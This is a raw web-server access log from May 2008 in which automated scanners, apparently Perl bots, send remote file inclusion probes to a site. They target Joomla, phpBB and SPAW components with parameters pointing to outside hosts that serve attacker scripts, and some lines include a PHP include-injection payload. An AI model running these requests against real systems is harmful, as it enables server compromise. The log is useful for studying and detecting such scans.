200.21.85.101 - - [06/May/2008:10:47:58 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:10:47:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:48:50 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.181.84.142 - - [06/May/2008:10:48:57 -0700] "GET /logs/tiny_includes/config.php?dir_ws=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.181.84.142 - - [06/May/2008:10:48:58 -0700] "GET /tiny_includes/config.php?dir_ws=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:10:49:11 -0700] "GET /index.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
62.213.74.114 - - [06/May/2008:10:49:11 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:49:12 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:49:16 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:49:21 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:49:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:49:22 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:49:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.67.28.3 - - [06/May/2008:10:49:28 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.1250kcue.com/phpauction/uploaded/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.28.3 - - [06/May/2008:10:49:28 -0700] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.1250kcue.com/phpauction/uploaded/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.28.3 - - [06/May/2008:10:49:28 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.1250kcue.com/phpauction/uploaded/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.28.3 - - [06/May/2008:10:49:28 -0700] "GET /logs/access_071209.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.1250kcue.com/phpauction/uploaded/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:49:31 -0700] "GET /logs/access.log/auto.php?inc=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:49:31 -0700] "GET /logs/auto.php?inc=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:49:31 -0700] "GET /auto.php?inc=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.212.19.235 - - [06/May/2008:10:49:58 -0700] "GET /logs/access.loghttp://scienceproject.eclub.lv/homework? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:01 -0700] "GET /logs/access_071219.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:02 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:05 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:10:50:08 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.230.251.145 - - [06/May/2008:10:50:16 -0700] "GET /logs/access_080215.log//index.php?option=com_mtree&task=listalpha&http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:17 -0700] "GET /logs/access_071219.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:17 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:18 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:50:18 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.67.28.3 - - [06/May/2008:10:50:19 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.1250kcue.com/phpauction/uploaded/Osirys-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:50:19 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:50:28 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:50:31 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:50:35 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:10:50:35 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:10:50:36 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:50:38 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.74 - - [06/May/2008:10:50:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://villeensports.free.fr/html/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:50:50 -0700] "GET /logs/access_071225.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:51:02 -0700] "GET /logs/access_071225.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:10:51:23 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:10:51:23 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [06/May/2008:10:51:23 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:51:23 -0700] "GET /logs/access_071224.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:51:27 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:51:36 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:51:37 -0700] "GET /logs/access_071224.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:51:39 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:51:40 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:51:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:51:44 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:51:45 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.1.92.216 - - [06/May/2008:10:51:54 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.fileden.com/files/2008/2/21/1772944/codice.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.86.181.227 - - [06/May/2008:10:51:57 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:52:11 -0700] "GET /logs/access.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:10:52:13 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:52:14 -0700] "GET /logs/access_080215.log/auto.php?inc=http://www.muangthai.com/bannerads/admin/uploadedimages/.bin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:52:17 -0700] "GET /logs/access.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.195.169.18 - - [06/May/2008:10:52:30 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:53:17 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [06/May/2008:10:53:19 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:53:47 -0700] "GET /logs/access_071216.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:53:48 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:53:51 -0700] "GET /logs/access_080131.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [06/May/2008:10:54:01 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:54:13 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:10:54:13 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:54:51 -0700] "GET /logs/access.log//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:54:55 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [06/May/2008:10:54:58 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:55:16 -0700] "GET /logs/access_080228.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:55:16 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:55:17 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:55:26 -0700] "GET /logs/access_080201.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.140 - - [06/May/2008:10:55:30 -0700] "GET /logs/access_080201.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:10:56:31 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:10:56:31 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:10:56:31 -0700] "GET /faqsupport/include.php?path[docroot]=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:10:56:32 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:38 -0700] "GET /logs/access_071129.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:38 -0700] "GET /logs/access_071129.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:38 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:38 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:43 -0700] "GET /logs/access_071116.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [06/May/2008:10:56:43 -0700] "GET /logs/access_071116.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:56:49 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.121.128.18 - - [06/May/2008:10:57:21 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.31.133 - - [06/May/2008:10:57:43 -0700] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.robosborn.com/blog/wp-content/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.181.84.142 - - [06/May/2008:10:57:59 -0700] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.181.84.142 - - [06/May/2008:10:57:59 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.181.84.142 - - [06/May/2008:10:58:00 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://logam.sitesled.com/danang/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:58:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:58:11 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [06/May/2008:10:58:12 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:58:23 -0700] "GET /logs/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:58:28 -0700] "GET /shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:58:31 -0700] "GET /logs/access_071219.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:58:31 -0700] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:58:36 -0700] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:58:39 -0700] "GET /logs/public/displayCategory.php?basepath=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:58:39 -0700] "GET /public/displayCategory.php?basepath=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:58:53 -0700] "GET /logs/index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:58:57 -0700] "GET /index.php?ort=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.95.186 - - [06/May/2008:10:59:08 -0700] "GET /logs/access_071218.log//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:10:59:17 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:10:59:17 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.228.200.67 - - [06/May/2008:10:59:18 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.128.80.102 - - [06/May/2008:11:00:08 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:00:57 -0700] "GET /logs/access_080225.log/faqsupport/include.php?path[docroot]=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:00:57 -0700] "GET /faqsupport/include.php?path[docroot]=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.138.166 - - [06/May/2008:11:00:57 -0700] "GET /logs/faqsupport/include.php?path[docroot]=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:01:01 -0700] "GET /logs/index.php?body=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:11:01:02 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
